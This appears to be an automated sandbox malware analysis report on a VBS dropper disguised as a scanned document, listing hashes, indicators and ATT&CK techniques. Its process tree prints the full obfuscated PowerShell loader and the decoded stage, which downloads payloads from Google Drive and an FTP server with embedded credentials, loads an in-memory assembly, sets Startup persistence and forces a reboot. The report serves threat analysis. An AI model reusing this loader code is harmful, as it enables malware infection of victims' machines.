f5afa028952cc301041f1c0911e1ef24e4bd5100f733252e045640e7b6d5c156

General

Target

SKMBT_77122024816310TD01_20220128_17311 .vbs
Size

681KB
MD5

63f4f98d6d8d123b77a55dc189e5990b
SHA1

5f3245ec3534dda85a10f2fd21a2bf4b64ed5eaa
SHA256

f5afa028952cc301041f1c0911e1ef24e4bd5100f733252e045640e7b6d5c156
SHA512

c1bb776d2b4cd8b176025d3911c2981d0794a056d2cb64e6a8a8df4a913bfb87dfe0585db4b74fac897e8fabbe30164c2ad5d1eae84f291ac703a8bfe16bfc79
SSDEEP

1536:9SSSSSSSSSSSSSSSSSSSSSSSx22222222222222222222222222222222222222I:7LeP6H07x/e

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SKMBT_77122024816310TD01_20220128_17311 .vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SKMBT_77122024816310TD01_20220128_17311 .vbs	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2508	powershell.exe
2748	powershell.exe
2780	powershell.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2508	powershell.exe
2748	powershell.exe
2804	powershell.exe
2780	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2508	powershell.exe
Token: SeDebugPrivilege	2748	powershell.exe
Token: SeDebugPrivilege	2804	powershell.exe
Token: SeDebugPrivilege	2780	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 1196 wrote to memory of 2508	1196	WScript.exe	30
PID 1196 wrote to memory of 2508	1196	WScript.exe	30
PID 1196 wrote to memory of 2508	1196	WScript.exe	30
PID 2508 wrote to memory of 2748	2508	powershell.exe	32
PID 2508 wrote to memory of 2748	2508	powershell.exe	32
PID 2508 wrote to memory of 2748	2508	powershell.exe	32
PID 2748 wrote to memory of 2804	2748	powershell.exe	33
PID 2748 wrote to memory of 2804	2748	powershell.exe	33
PID 2748 wrote to memory of 2804	2748	powershell.exe	33
PID 2804 wrote to memory of 2724	2804	powershell.exe	34
PID 2804 wrote to memory of 2724	2804	powershell.exe	34
PID 2804 wrote to memory of 2724	2804	powershell.exe	34
PID 2748 wrote to memory of 2780	2748	powershell.exe	35
PID 2748 wrote to memory of 2780	2748	powershell.exe	35
PID 2748 wrote to memory of 2780	2748	powershell.exe	35

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SKMBT_77122024816310TD01_20220128_17311 .vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1196
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9Ќз革DsЌз革KQЌз革gЌз革CkЌз革IЌз革Ќз革nЌз革GUЌз革dQByЌз革HQЌз革JwЌз革gЌз革CwЌз革IЌз革BlЌз革GoЌз革dwB6Ќз革GgЌз革JЌз革Ќз革gЌз革CwЌз革IЌз革Ќз革nЌз革GgЌз革dЌз革B0Ќз革HЌз革Ќз革cwЌз革6Ќз革C8Ќз革LwBlЌз革HYЌз革aQByЌз革HQЌз革dQBhЌз革GwЌз革cwBlЌз革HIЌз革dgBpЌз革GMЌз革ZQBzЌз革HIЌз革ZQB2Ќз革GkЌз革ZQB3Ќз革HMЌз革LgBjЌз革G8Ќз革bQЌз革vЌз革HoЌз革cgЌз革uЌз革HQЌз革eЌз革B0Ќз革CcЌз革IЌз革Ќз革oЌз革CЌз革Ќз革XQBdЌз革FsЌз革dЌз革BjЌз革GUЌз革agBiЌз革G8Ќз革WwЌз革gЌз革CwЌз革IЌз革BsЌз革GwЌз革dQBuЌз革CQЌз革IЌз革Ќз革oЌз革GUЌз革awBvЌз革HYЌз革bgBJЌз革C4Ќз革KQЌз革gЌз革CcЌз革SQBWЌз革EYЌз革cgBwЌз革CcЌз革IЌз革Ќз革oЌз革GQЌз革bwBoЌз革HQЌз革ZQBNЌз革HQЌз革ZQBHЌз革C4Ќз革KQЌз革nЌз革DEЌз革cwBzЌз革GEЌз革bЌз革BDЌз革C4Ќз革MwB5Ќз革HIЌз革YQByЌз革GIЌз革aQBMЌз革HMЌз革cwBhЌз革GwЌз革QwЌз革nЌз革CgЌз革ZQBwЌз革HkЌз革VЌз革B0Ќз革GUЌз革RwЌз革uЌз革CkЌз革IЌз革BGЌз革FMЌз革dQB2Ќз革HcЌз革JЌз革Ќз革gЌз革CgЌз革ZЌз革BhЌз革G8Ќз革TЌз革Ќз革uЌз革G4Ќз革aQBhЌз革G0Ќз革bwBEЌз革HQЌз革bgBlЌз革HIЌз革cgB1Ќз革EMЌз革OgЌз革6Ќз革F0Ќз革bgBpЌз革GEЌз革bQBvЌз革EQЌз革cЌз革BwЌз革EEЌз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革DsЌз革KQЌз革gЌз革CkЌз革IЌз革Ќз革nЌз革EEЌз革JwЌз革gЌз革CwЌз革IЌз革Ќз革nЌз革JMhOgCTIScЌз革IЌз革Ќз革oЌз革GUЌз革YwBhЌз革GwЌз革cЌз革BlЌз革FIЌз革LgBnЌз革FMЌз革egBDЌз革EIЌз革bЌз革Ќз革kЌз革CЌз革Ќз革KЌз革BnЌз革G4Ќз革aQByЌз革HQЌз革UwЌз革0Ќз革DYЌз革ZQBzЌз革GEЌз革QgBtЌз革G8Ќз革cgBGЌз革DoЌз革OgBdЌз革HQЌз革cgBlЌз革HYЌз革bgBvЌз革EMЌз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革CЌз革Ќз革PQЌз革gЌз革EYЌз革UwB1Ќз革HYЌз革dwЌз革kЌз革CЌз革Ќз革XQBdЌз革FsЌз革ZQB0Ќз革HkЌз革QgBbЌз革DsЌз革JwЌз革lЌз革EkЌз革aЌз革BxЌз革FIЌз革WЌз革Ќз革lЌз革CcЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革ZQBqЌз革HcЌз革egBoЌз革CQЌз革OwЌз革pЌз革CЌз革Ќз革ZwBTЌз革HoЌз革QwBCЌз革GwЌз革JЌз革Ќз革gЌз革CgЌз革ZwBuЌз革GkЌз革cgB0Ќз革FMЌз革ZЌз革BhЌз革G8Ќз革bЌз革BuЌз革HcЌз革bwBEЌз革C4Ќз革dgB4Ќз革GsЌз革dwЌз革kЌз革CЌз革Ќз革PQЌз革gЌз革GcЌз革UwB6Ќз革EMЌз革QgBsЌз革CQЌз革OwЌз革4Ќз革EYЌз革VЌз革BVЌз革DoЌз革OgBdЌз革GcЌз革bgBpЌз革GQЌз革bwBjЌз革G4Ќз革RQЌз革uЌз革HQЌз革eЌз革BlЌз革FQЌз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革CЌз革Ќз革PQЌз革gЌз革GcЌз革bgBpЌз革GQЌз革bwBjЌз革G4Ќз革RQЌз革uЌз革HYЌз革eЌз革BrЌз革HcЌз革JЌз革Ќз革7Ќз革CkЌз革dЌз革BuЌз革GUЌз革aQBsЌз革EMЌз革YgBlЌз革FcЌз革LgB0Ќз革GUЌз革TgЌз革gЌз革HQЌз革YwBlЌз革GoЌз革YgBPЌз革C0Ќз革dwBlЌз革E4Ќз革KЌз革Ќз革gЌз革D0Ќз革IЌз革B2Ќз革HgЌз革awB3Ќз革CQЌз革OwЌз革pЌз革CgЌз革ZQBzЌз革G8Ќз革cЌз革BzЌз革GkЌз革ZЌз革Ќз革uЌз革HYЌз革eЌз革BrЌз革HcЌз革JЌз革Ќз革7Ќз革CkЌз革IЌз革Ќз革nЌз革HQЌз革eЌз革B0Ќз革C4Ќз革MQЌз革wЌз革EwЌз革TЌз革BEЌз革C8Ќз革MQЌз革wЌз革C8Ќз革cgBlЌз革HQЌз革cЌз革B5Ќз革HIЌз革YwBwЌз革FUЌз革LwByЌз革GIЌз革LgBtЌз革G8Ќз革YwЌз革uЌз革HQЌз革YQByЌз革GIЌз革dgBrЌз革GMЌз革cwBlЌз革GQЌз革LgBwЌз革HQЌз革ZgBЌз革Ќз革DEЌз革dЌз革BhЌз革HIЌз革YgB2Ќз革GsЌз革YwBzЌз革GUЌз革ZЌз革Ќз革vЌз革C8Ќз革OgBwЌз革HQЌз革ZgЌз革nЌз革CЌз革Ќз革KЌз革BnЌз革G4Ќз革aQByЌз革HQЌз革UwBkЌз革GEЌз革bwBsЌз革G4Ќз革dwBvЌз革EQЌз革LgB2Ќз革HgЌз革awB3Ќз革CQЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革ZwBTЌз革HoЌз革QwBCЌз革GwЌз革JЌз革Ќз革7Ќз革CkЌз革JwBЌз革Ќз革EЌз革Ќз革cЌз革BKЌз革DgЌз革NwЌз革1Ќз革DEЌз革MgBvЌз革HIЌз革cЌз革ByЌз革GUЌз革cЌз革BvЌз革GwЌз革ZQB2Ќз革GUЌз革ZЌз革Ќз革nЌз革CwЌз革KQЌз革pЌз革DkЌз革NЌз革Ќз革sЌз革DYЌз革MQЌз革xЌз革CwЌз革NwЌз革5Ќз革CwЌз革NЌз革Ќз革xЌз革DEЌз革LЌз革Ќз革4Ќз革DkЌз革LЌз革Ќз革4Ќз革DEЌз革MQЌз革sЌз革DcЌз革MЌз革Ќз革xЌз革CwЌз革OQЌз革5Ќз革CwЌз革NQЌз革xЌз革DEЌз革LЌз革Ќз革xЌз革DЌз革Ќз革MQЌз革sЌз革DЌз革Ќз革MЌз革Ќз革xЌз革CgЌз革XQBdЌз革FsЌз革cgBhЌз革GgЌз革YwBbЌз革CЌз革Ќз革bgBpЌз革G8Ќз革agЌз革tЌз革CgЌз革KЌз革BsЌз革GEЌз革aQB0Ќз革G4Ќз革ZQBkЌз革GUЌз革cgBDЌз革GsЌз革cgBvЌз革HcЌз革dЌз革BlЌз革E4Ќз革LgB0Ќз革GUЌз革TgЌз革uЌз革G0Ќз革ZQB0Ќз革HMЌз革eQBTЌз革CЌз革Ќз革dЌз革BjЌз革GUЌз革agBiЌз革G8Ќз革LQB3Ќз革GUЌз革bgЌз革gЌз革D0Ќз革IЌз革BzЌз革GwЌз革YQBpЌз革HQЌз革bgBlЌз革GQЌз革ZQByЌз革EMЌз革LgB2Ќз革HgЌз革awB3Ќз革CQЌз革OwЌз革4Ќз革EYЌз革VЌз革BVЌз革DoЌз革OgBdЌз革GcЌз革bgBpЌз革GQЌз革bwBjЌз革G4Ќз革RQЌз革uЌз革HQЌз革eЌз革BlЌз革FQЌз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革CЌз革Ќз革PQЌз革gЌз革GcЌз革bgBpЌз革GQЌз革bwBjЌз革G4Ќз革RQЌз革uЌз革HYЌз革eЌз革BrЌз革HcЌз革JЌз革Ќз革7Ќз革CkЌз革dЌз革BuЌз革GUЌз革aQBsЌз革EMЌз革YgBlЌз革FcЌз革LgB0Ќз革GUЌз革TgЌз革gЌз革HQЌз革YwBlЌз革GoЌз革YgBPЌз革C0Ќз革dwBlЌз革E4Ќз革KЌз革Ќз革gЌз革D0Ќз革IЌз革B2Ќз革HgЌз革awB3Ќз革CQЌз革OwBnЌз革FMЌз革egBDЌз革EIЌз革bЌз革Ќз革kЌз革DsЌз革MgЌз革xЌз革HMЌз革bЌз革BUЌз革DoЌз革OgBdЌз革GUЌз革cЌз革B5Ќз革FQЌз革bЌз革BvЌз革GMЌз革bwB0Ќз革G8Ќз革cgBQЌз革HkЌз革dЌз革BpЌз革HIЌз革dQBjЌз革GUЌз革UwЌз革uЌз革HQЌз革ZQBOЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革gЌз革D0Ќз革IЌз革BsЌз革G8Ќз革YwBvЌз革HQЌз革bwByЌз革FЌз革Ќз革eQB0Ќз革GkЌз革cgB1Ќз革GMЌз革ZQBTЌз革DoЌз革OgBdЌз革HIЌз革ZQBnЌз革GEЌз革bgBhЌз革E0Ќз革dЌз革BuЌз革GkЌз革bwBQЌз革GUЌз革YwBpЌз革HYЌз革cgBlЌз革FMЌз革LgB0Ќз革GUЌз革TgЌз革uЌз革G0Ќз革ZQB0Ќз革HMЌз革eQBTЌз革FsЌз革OwB9Ќз革GUЌз革dQByЌз革HQЌз革JЌз革B7Ќз革CЌз革Ќз革PQЌз革gЌз革GsЌз革YwBhЌз革GIЌз革bЌз革BsЌз革GEЌз革QwBuЌз革G8Ќз革aQB0Ќз革GEЌз革ZЌз革BpЌз革GwЌз革YQBWЌз革GUЌз革dЌз革BhЌз革GMЌз革aQBmЌз革GkЌз革dЌз革ByЌз革GUЌз革QwByЌз革GUЌз革dgByЌз革GUЌз革UwЌз革6Ќз革DoЌз革XQByЌз革GUЌз革ZwBhЌз革G4Ќз革YQBNЌз革HQЌз革bgBpЌз革G8Ќз革UЌз革BlЌз革GMЌз革aQB2Ќз革HIЌз革ZQBTЌз革C4Ќз革dЌз革BlЌз革E4Ќз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革HsЌз革IЌз革BlЌз革HMЌз革bЌз革BlЌз革H0Ќз革IЌз革BmЌз革C8Ќз革IЌз革Ќз革wЌз革CЌз革Ќз革dЌз革Ќз革vЌз革CЌз革Ќз革cgЌз革vЌз革CЌз革Ќз革ZQB4Ќз革GUЌз革LgBuЌз革HcЌз革bwBkЌз革HQЌз革dQBoЌз革HMЌз革IЌз革Ќз革7Ќз革CcЌз革MЌз革Ќз革4Ќз革DEЌз革IЌз革BwЌз革GUЌз革ZQBsЌз革HMЌз革JwЌз革gЌз革GQЌз革bgBhЌз革G0Ќз革bQBvЌз革GMЌз革LQЌз革gЌз革GUЌз革eЌз革BlЌз革C4Ќз革bЌз革BsЌз革GUЌз革aЌз革BzЌз革HIЌз革ZQB3Ќз革G8Ќз革cЌз革Ќз革7Ќз革CЌз革Ќз革ZQBjЌз革HIЌз革bwBmЌз革C0Ќз革IЌз革Ќз革pЌз革CЌз革Ќз革JwBwЌз革HUЌз革dЌз革ByЌз革GEЌз革dЌз革BTЌз革FwЌз革cwBtЌз革GEЌз革cgBnЌз革G8Ќз革cgBQЌз革FwЌз革dQBuЌз革GUЌз革TQЌз革gЌз革HQЌз革cgBhЌз革HQЌз革UwBcЌз革HMЌз革dwBvЌз革GQЌз革bgBpЌз革FcЌз革XЌз革B0Ќз革GYЌз革bwBzЌз革G8Ќз革cgBjЌз革GkЌз革TQBcЌз革GcЌз革bgBpЌз革G0Ќз革YQBvЌз革FIЌз革XЌз革BhЌз革HQЌз革YQBEЌз革HЌз革Ќз革cЌз革BBЌз革FwЌз革JwЌз革gЌз革CsЌз革IЌз革BGЌз革EcЌз革cgBVЌз革EEЌз革JЌз革Ќз革gЌз革CgЌз革IЌз革BuЌз革G8Ќз革aQB0Ќз革GEЌз革bgBpЌз革HQЌз革cwBlЌз革EQЌз革LQЌз革gЌз革CcЌз革JQBJЌз革GgЌз革cQBSЌз革FgЌз革JQЌз革nЌз革CЌз革Ќз革bQBlЌз革HQЌз革SQЌз革tЌз革HkЌз革cЌз革BvЌз革EMЌз革IЌз革Ќз革7Ќз革CЌз革Ќз革dЌз革ByЌз革GEЌз革dЌз革BzЌз革GUЌз革cgBvЌз革G4Ќз革LwЌз革gЌз革HQЌз革ZQBpЌз革HUЌз革cQЌз革vЌз革CЌз革Ќз革UQBBЌз革GoЌз革egBJЌз革CЌз革Ќз革ZQB4Ќз革GUЌз革LgBhЌз革HMЌз革dQB3Ќз革CЌз革Ќз革ZQB4Ќз革GUЌз革LgBsЌз革GwЌз革ZQBoЌз革HMЌз革cgBlЌз革HcЌз革bwBwЌз革CЌз革Ќз革OwЌз革pЌз革CcЌз革dQBzЌз革G0Ќз革LgBuЌз革GkЌз革dwBwЌз革FUЌз革XЌз革Ќз革nЌз革CЌз革Ќз革KwЌз革gЌз革GQЌз革SQBSЌз革GkЌз革TQЌз革kЌз革CgЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革UQBBЌз革GoЌз革egBJЌз革DsЌз革KQЌз革gЌз革GUЌз革bQBhЌз革E4Ќз革cgBlЌз革HMЌз革VQЌз革6Ќз革DoЌз革XQB0Ќз革G4Ќз革ZQBtЌз革G4Ќз革bwByЌз革GkЌз革dgBuЌз革EUЌз革WwЌз革gЌз革CsЌз革IЌз革Ќз革nЌз革FwЌз革cwByЌз革GUЌз革cwBVЌз革FwЌз革OgBDЌз革CcЌз革KЌз革Ќз革gЌз革D0Ќз革IЌз革BGЌз革EcЌз革cgBVЌз革EEЌз革JЌз革Ќз革7Ќз革CkЌз革JwB1Ќз革HMЌз革bQЌз革uЌз革G4Ќз革aQB3Ќз革HЌз革Ќз革VQBcЌз革CcЌз革IЌз革Ќз革rЌз革CЌз革Ќз革ZЌз革BJЌз革FIЌз革aQBNЌз革CQЌз革IЌз革Ќз革sЌз革EIЌз革SwBMЌз革FIЌз革VQЌз革kЌз革CgЌз革ZQBsЌз革GkЌз革RgBkЌз革GEЌз革bwBsЌз革G4Ќз革dwBvЌз革EQЌз革LgBpЌз革E0Ќз革bwBhЌз革EkЌз革JЌз革Ќз革7Ќз革DgЌз革RgBUЌз革FUЌз革OgЌз革6Ќз革F0Ќз革ZwBuЌз革GkЌз革ZЌз革BvЌз革GMЌз革bgBFЌз革C4Ќз革dЌз革B4Ќз革GUЌз革VЌз革Ќз革uЌз革G0Ќз革ZQB0Ќз革HMЌз革eQBTЌз革FsЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革ZwBuЌз革GkЌз革ZЌз革BvЌз革GMЌз革bgBFЌз革C4Ќз革aQBNЌз革G8Ќз革YQBJЌз革CQЌз革OwЌз革pЌз革HQЌз革bgBlЌз革GkЌз革bЌз革BDЌз革GIЌз革ZQBXЌз革C4Ќз革dЌз革BlЌз革E4Ќз革IЌз革B0Ќз革GMЌз革ZQBqЌз革GIЌз革TwЌз革tЌз革HcЌз革ZQBOЌз革CgЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革aQBNЌз革G8Ќз革YQBJЌз革CQЌз革OwB9Ќз革DsЌз革IЌз革Ќз革pЌз革CcЌз革dЌз革BPЌз革EwЌз革YwBfЌз革EsЌз革YQЌз革zЌз革FoЌз革ZgBvЌз革FgЌз革MgBKЌз革EoЌз革cgBWЌз革GgЌз革bQBWЌз革DkЌз革YwBtЌз革DkЌз革WЌз革BzЌз革HUЌз革WЌз革BtЌз革GoЌз革MQBnЌз革DEЌз革JwЌз革gЌз革CsЌз革IЌз革BGЌз革GEЌз革RQBZЌз革FIЌз革JЌз革Ќз革oЌз革CЌз革Ќз革PQЌз革gЌз革EYЌз革YQBFЌз革FkЌз革UgЌз革kЌз革HsЌз革IЌз革BlЌз革HMЌз革bЌз革BlЌз革H0Ќз革OwЌз革gЌз革CkЌз革JwЌз革yЌз革DQЌз革dQBYЌз革EoЌз革VЌз革BxЌз革GEЌз革bQBnЌз革HkЌз革TQB0Ќз革EYЌз革egBhЌз革GsЌз革UЌз革BSЌз革DEЌз革cQBfЌз革EkЌз革dgBHЌз革GkЌз革WЌз革BOЌз革GQЌз革cQBhЌз革E4Ќз革MQЌз革nЌз革CЌз革Ќз革KwЌз革gЌз革EYЌз革YQBFЌз革FkЌз革UgЌз革kЌз革CgAIAA9ACAARgBhAEUAWQBSACQAewAgACkAIABXAGkAaQBCAHMAJAAgACgAIABmAGkAOwAgACkAJwA0ADYAJwAoAHMAbgBpAGEAdABuAG8AQwAuAEUAUgBVAFQAQwBFAFQASQBIAEMAUgBBAF8AUgBPAFMAUwBFAEMATwBSAFAAOgB2AG4AZQAkACAAPQAgAFcAaQBpAEIAcwAkADsAJwA9AGQAaQAmAGQAYQBvAGwAbgB3AG8AZAA9AHQAcgBvAHAAeABlAD8AYwB1AC8AbQBvAGMALgBlAGwAZwBvAG8AZwAuAGUAdgBpAHIAZAAvAC8AOgBzAHAAdAB0AGgAJwAgAD0AIABGAGEARQBZAFIAJAA7ACkAIAAnAHUAcwBtAC4AbgBpAHcAcABVAFwAJwAgACsAIABkAEkAUgBpAE0AJAAgACgAIABsAGUAZAA7ACkAKABoAHQAYQBQAHAAbQBlAFQAdABlAEcAOgA6AF0AaAB0AGEAUAAuAE8ASQAuAG0AZQB0AHMAeQBTAFsAIAA9ACAAZABJAFIAaQBNACQAewAgACkAIABhAEoAbgBVAGkAJAAgACgAIABmAGkAOwAgACkAMgAoAHMAbABhAHUAcQBFAC4AcgBvAGoAYQBNAC4AbgBvAGkAcwByAGUAVgAuAHQAcwBvAGgAJAAgAD0AIABhAEoAbgBVAGkAJAAgADsA';$txJSA = $qKKzc.replace('Ќз革' , 'A') ;$oXODH = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $txJSA ) ); $oXODH = $oXODH[-1..-$oXODH.Length] -join '';$oXODH = $oXODH.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\SKMBT_77122024816310TD01_20220128_17311 .vbs');powershell $oXODH
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2508
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $iUnJa = $host.Version.Major.Equals(2) ;if ( $iUnJa ) {$MiRId = [System.IO.Path]::GetTempPath();del ( $MiRId + '\Upwin.msu' );$RYEaF = 'https://drive.google.com/uc?export=download&id=';$sBiiW = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $sBiiW ) {$RYEaF = ($RYEaF + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$RYEaF = ($RYEaF + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$IaoMi = (New-Object Net.WebClient);$IaoMi.Encoding = [System.Text.Encoding]::UTF8;$IaoMi.DownloadFile($URLKB, $MiRId + '\Upwin.msu');$AUrGF = ('C:\Users\' + [Environment]::UserName );IzjAQ = ($MiRId + '\Upwin.msu'); powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\SKMBT_77122024816310TD01_20220128_17311 .vbs' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$wkxv = (New-Object Net.WebClient);$wkxv.Encoding = [System.Text.Encoding]::UTF8;$wkxv.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $wkxv.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$wkxv.dispose();$wkxv = (New-Object Net.WebClient);$wkxv.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $wkxv.DownloadString( $lBCzSg );$hzwje = 'C:\Users\Admin\AppData\Local\Temp\SKMBT_77122024816310TD01_20220128_17311 .vbs';[Byte[]] $wvuSF = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $wvuSF ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.rz/moc.sweiversecivreslautrive//:sptth' , $hzwje , 'true' ) );};"
    3⤵
    - Drops startup file
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2748
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe IzjAQ /quiet /norestart
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2804
    - - C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" IzjAQ /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:2724
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2780

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
9ef6984c77ce7e06552d470d616dfd6d

SHA1
f5b781abd1b638aa5b6a253510f3d3848cc88a08

SHA256
9520cd87cc2b85c1ca386200b6c37141a68a8fc0a67c5ea488dd82dfc6985d78

SHA512
06a4fff2d2d06f8e0221e2e07bea4efe95f3997ba7613865d8624b2548b624fa9af6c001b2bacbddf041ae5dbdd9bb30cba79b397e0ba5845e95c0d511088148

Download Submit
memory/2508-4-0x000007FEF591E000-0x000007FEF591F000-memory.dmp

Filesize
4KB

Download
memory/2508-7-0x000007FEF5660000-0x000007FEF5FFD000-memory.dmp

Filesize
9.6MB

Download
memory/2508-6-0x0000000001D80000-0x0000000001D88000-memory.dmp

Filesize
32KB

Download
memory/2508-5-0x000000001B890000-0x000000001BB72000-memory.dmp

Filesize
2.9MB

Download
memory/2508-8-0x000007FEF5660000-0x000007FEF5FFD000-memory.dmp

Filesize
9.6MB

Download
memory/2508-10-0x000007FEF5660000-0x000007FEF5FFD000-memory.dmp

Filesize
9.6MB

Download
memory/2508-9-0x000007FEF5660000-0x000007FEF5FFD000-memory.dmp

Filesize
9.6MB

Download
memory/2508-11-0x000007FEF5660000-0x000007FEF5FFD000-memory.dmp

Filesize
9.6MB

Download
memory/2508-29-0x000007FEF591E000-0x000007FEF591F000-memory.dmp

Filesize
4KB

Download
memory/2508-30-0x000007FEF5660000-0x000007FEF5FFD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing